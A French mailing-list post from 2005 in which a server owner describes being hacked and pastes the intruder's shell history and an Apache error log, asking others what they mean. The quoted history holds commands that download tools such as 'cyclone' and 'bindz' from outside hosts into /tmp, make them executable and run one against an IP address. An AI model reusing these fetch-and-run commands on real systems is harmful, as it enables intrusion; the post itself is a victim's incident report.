[Linux-bruxelles] hack (c'est pas fini)
Alain BarBason
alain at barbason.be
Mer 7 Sep 22:31:39 CEST 2005
Alain BarBason a écrit :
> bonjour,
>
> Je me suis fait hacker mon serveur, la deuxième en +/- 4 ans, bon je
> suis pas un féroce de la protection.
Et voici la suite.
j'ai retrouvé ce soir bindz, bindz.1 ... dans /tmp
ainsi qu'un .bash_history
> host ccc.ma
> id
> host 207.44.197.233
> host 64.82.25.188
> ping -c 3 www.securityhack.net
> id*
> id
> rm -rf bindz
> ping
> cd /tmp;wget http://go0gler.com/cyclone;chmod 777 cyclone
> chmod 777 cyclone
> ./cyclone 72.22.64.102 80
et un error.log de /var/log/apache2
si ca vous dit qqchose ?
(pour l'instant, j'ai desinstallé/installé mon serveur apache, on verra
demain :-)
> sh: line 1: cd: /var/tmp: No such file or directory
> --21:55:41-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
> bindz: Permission denied
>
> Cannot write to `bindz' (Permission denied).
> chmod: cannot access `bindz': No such file or directory
> sh: line 1: cd: /var/tmp: No such file or directory
> --21:55:43-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
> bindz: Permission denied
>
> Cannot write to `bindz' (Permission denied).
> chmod: cannot access `bindz': No such file or directory
> sh: line 1: cd: /var/tmp: No such file or directory
> --21:55:44-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
> bindz: Permission denied
>
> Cannot write to `bindz' (Permission denied).
> chmod: cannot access `bindz': No such file or directory
> --21:55:46-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
>
> 0K .......... ........ 100% 52.18 KB/s
>
> 21:55:47 (52.18 KB/s) - `bindz' saved [19429/19429]
>
> --21:55:48-- http://mudmusicinc.com/xss/bindz
> => `bindz.1'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
>
> 0K .......... ........ 100% 52.15 KB/s
>
> 21:55:49 (52.15 KB/s) - `bindz.1' saved [19429/19429]
>
> --21:55:50-- http://mudmusicinc.com/xss/bindz
> => `bindz.2'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
>
> 0K .......... ........ 100% 52.06 KB/s
>
> 21:55:51 (52.06 KB/s) - `bindz.2' saved [19429/19429]
>
--
by AlainBB
http://www.barbason.be
Plus d'informations sur la liste de diffusion Linux-bruxelles